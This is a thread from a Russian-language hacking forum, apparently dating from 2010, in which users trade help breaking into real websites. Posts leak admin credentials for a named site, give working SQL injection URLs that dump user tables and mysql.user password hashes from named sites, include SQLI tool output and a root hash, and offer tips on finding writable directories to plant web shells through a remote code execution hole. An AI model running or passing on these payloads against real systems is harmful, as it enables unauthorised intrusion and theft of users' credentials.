29.05.2010, 18:11
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Не могу залить шелл.
админка:http://zoor.biz/user/
Username:zbo_admin
password:shaka13
|
|
|
29.05.2010, 18:20
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Не могу залить шелл.
http://zoor.biz/company.php?cn=ARSHAD+RASHEED+MUGHAL+PLASTIC+STORE &id=-6019+union+select+1,2,3,concat_ws(0x3a,uid,
name,
pass,
mail,
mode,
sort,
threshold,
theme,
signature,
signature_format,
created,
access,
login,
status,
timezone,
language,
picture,
init,
data),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +hashoo_zbo.users+limit+1,1+--+
|
|
|
|
29.05.2010, 18:34
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
Сообщение от FlaktW
Не могу залить шелл.
http://zoor.biz/company.php?cn=ARSHAD+RASHEED+MUGHAL+PLASTIC+STORE &id=-6019+union+select+1,2,3,concat_ws(0x3a,uid,
name,
pass,
mail,
mode,
sort,
threshold,
theme,
signature,
signature_format,
created,
access,
login,
status,
timezone,
language,
picture,
init,
data),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +hashoo_zbo.users+limit+1,1+--+
В ПМ кинул!!
|
|
|
|
29.05.2010, 16:31
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами:
8984365
Репутация:
45
|
|
Работа SQLI Helper V 2.7
Get Server Info
Check if URL is Vulnerable
URL is Vulnerable
Check No. of Columns
No. of columns : 1
Check No. of Columns - finished
Looking for larget text visible column
Col num 1 found
Check if supports union
Check if supports union - finished
Check Current user
Check Current user - finished
Check if database version
Check if database version - finished
Check Current Database
Check current database - finished
Checking LoadFile
Check Load File - finished
при Get Database:
Mysql is version 4 please brute either tables or columns
при Get Tables:
Mysql is version 4 please brute either tables or columns
при Get Collumns:
ничего, так как таблица не выбрана.
вывод этого же хелпера:
host Information Value
Server Apache/2.0.52(Red Hat)
Version 4.1.22
Powered by PHP/5.2.11
Attack Type SQL Union Injection
Current User blablabla@localhost
Current Database namebaseBS
Supports Union yes
Union Columns 1
чем брутить таблицу? Как до нее вообще добраться? |
|
|
|
29.05.2010, 19:22
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами:
8984365
Репутация:
45
|
|
Блин, ну натолкните на идею или статью... Я уже задолбался.
Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?
ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет
НАпротив акка root вот такой хеш: 3649d1fc783e0b49
Последний раз редактировалось DrakonSerg; 29.05.2010 в 19:24..
|
|
|
|
29.05.2010, 19:25
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Пара вопросов по php, во первых, как через php inj найти директории на запись и вывести их на экран?
консольная команда find / -type d -perm 2 не пашет почти нигде, с учётом что системные команды выполняются нормально.
Далее столкнулся с такой траблой, что ни в одну директорию нельзя залить\создать файл, хотя права там полные, пробовал через fopen (далее конструкция fputs и т.д..), пробовал через copy, и через wget, всё одно и тоже, даже через echo пробовал создать тестовый файл в директории... как будто записи нету, хотя права на запись есть.
Таких сайтов много, все разные и друг с другом не связаны (их лишь связывает общяя уязвимость remote code), но ни на одном файлов не создать.
Инклуд так-же не пашет, шелл полностью нефункциональный. Может посоветуете что.
|
|
|
|
29.05.2010, 19:35
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Nightmarе
Пара вопросов по php, во первых, как через php inj найти директории на запись и вывести их на экран?
консольная команда find / -type d -perm 2 не пашет почти нигде, с учётом что системные команды выполняются нормально.
Nightmare это тоже не катит?
print(`find / -type d -perm 2`)
|
|
|
|
29.05.2010, 19:37
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от Konqi
Nightmare это тоже не катит?
print(`find / -type d -perm 2`)
к сожалению тоже ничего не выводит на экран ;(
|
|
|
|
29.05.2010, 19:41
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Nightmarе
Пара вопросов по php, во первых, как через php inj найти директории на запись и вывести их на экран?
консольная команда find / -type d -perm 2 не пашет почти нигде, с учётом что системные команды выполняются нормально.
Далее столкнулся с такой траблой, что ни в одну директорию нельзя залить\создать файл, хотя права там полные, пробовал через fopen (далее конструкция fputs и т.д..), пробовал через copy, и через wget, всё одно и тоже, даже через echo пробовал создать тестовый файл в директории... как будто записи нету, хотя права на запись есть.
Таких сайтов много, все разные и друг с другом не связаны (их лишь связывает общяя уязвимость remote code), но ни на одном файлов не создать.
Инклуд так-же не пашет, шелл полностью нефункциональный. Может посоветуете что.
find / -perm -2 -type d -ls
Сообщение от DrakonSerg
Блин, ну натолкните на идею или статью... Я уже задолбался.
Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?
ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет
НАпротив акка root вот такой хеш: 3649d1fc783e0b49
искать не пробывал?
https://forum.antichat.ru/threadnav43966-1-10.html
https://forum.antichat.ru/thread19844.html
Последний раз редактировалось .:[melkiy]:.; 29.05.2010 в 19:44..
|
|
|
|
29.05.2010, 19:26
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от DrakonSerg
Блин, ну натолкните на идею или статью... Я уже задолбался.
Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?
ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет
по этому нужно работать руками а не программами!
tables-- select+group_concat(table_name)+from+information_s chema.tables--
columns-- select+group_concat(column_name)+from_information_ schema.columns+where+table_name=" yourtable"
НАпротив акка root вот такой хеш: 3649d1fc783e0b49
hash type: MySQL
не твой сайт что ли?
http://www.southworth.com/page.php?id=-5+union+select+group_concat(user,0x3a,password,0x3 c42723e)+from+mysql.user
Последний раз редактировалось Konqi; 29.05.2010 в 19:30..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2172626){kind=avatar}
Похожие темы
Комбинированный вид
